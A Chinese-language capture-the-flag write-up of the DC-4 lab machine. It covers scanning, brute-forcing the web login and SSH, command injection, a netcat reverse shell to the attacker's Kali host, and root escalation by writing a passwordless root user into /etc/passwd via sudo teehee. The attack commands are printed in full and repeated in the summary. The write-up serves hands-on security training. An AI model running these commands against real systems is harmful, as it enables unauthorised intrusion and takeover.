DC- 4 靶机复盘

信息搜集

1. IP扫描

nmap -sP -T4 10.4.7.0/24

得到 IP地址：
kali ip ：10.4.7.128
靶机IP：10.4.7.130

2. 端口扫描

nmap -A -p- 10.4.7.130 -sV

扫描出该靶机开放了 22 和 80 端口，分别开放了 ssh 和 http 服务。

3. 目录扫描

dirb http://10.4.7.130/

并没有发现什么有用的信息

4. 访问网页

访问后发现一个登录框，其他什么都没有，可以尝试进行密码爆破

渗透步骤

1. 用户密码爆破

在登录框随便输入用户名和密码，点击登入，用burpsuite抓包

将抓到的请求报文发送到 intruder

标记出密码，猜测用户名是 admin

进行爆破攻击

爆破成功
查看回显报文最长的包，得到密码
密码：happy

然后进行登录

来到命令执行的界面

2. 任意命令执行

使用bp进行抓包，右键发到重发器

3. 反弹shell

通过尝试，不能echo命令写入木马，只好换一种方法进行反弹shell
可以尝试使用 nc 进行反弹
先在 kali 上使用nc 监听8888端口
nc - lnvp 8888

然后回到 bp上，让靶机执行以下命令，将 shell 弹到 kali 监听的 8888 端口上
nc -e /bin/bash 10.4.7.128 8888

还要先将其进行URL编码

然后进行传参

成功获得shell
进行升级为交互shell
python -c 'import pty;pty.spawn("/bin/bash")'

4. 尝试提权

前面打DC靶场学到的提权方式在这都不管用了，所以就不演示了

看一下该主机的普通用户，能不能尝试登进去寻找其他突破口

可以看到有三个普通用户，测试发现，只有jim用户才有权限查看
来到/home/jim/backups目录下

打开该文件，有一堆密码在（根据文件名的提示，应该是之前用过的老密码）

将这些密码复制，然后放着一个文件里，然后进行密码爆破
hydra -l jim -P 1.txt ssh://10.4.7.130 -V


得到账号密码：
jim:jibril04

然后ssh 远程登陆

接着尝试打开刚才反弹shell打开不了的文件mbox

说我有一封来自root用户的信，接着我们去邮箱找一下/var/spool/mail

邮件中说：今天结束时我要去度假，所以老板让我给你我的密码，以防万一。
并给出了密码
charles:^xHhA&hvim0y
用该账号密码进行 ssh 进行登录

该用户还不是root用户，要进行提权

发现了个root权限的命令teehee（小型文本编辑器），可以利用这个命令进行提权
echo "zs::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
利用管道符配合teehee命令，在passwd文件里写入一个不用密码的root权限用户zs

查找flag

find / -name flag.txt

成功获得flag

完成！

总结

1. nc 反弹shell命令

nc -e /bin/bash [监听的IP，也是kali ip] [监听的端口]

2. teehee 提权

echo "zs::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

原理就是通过修改passwd文件，添加一个无密码root权限的用户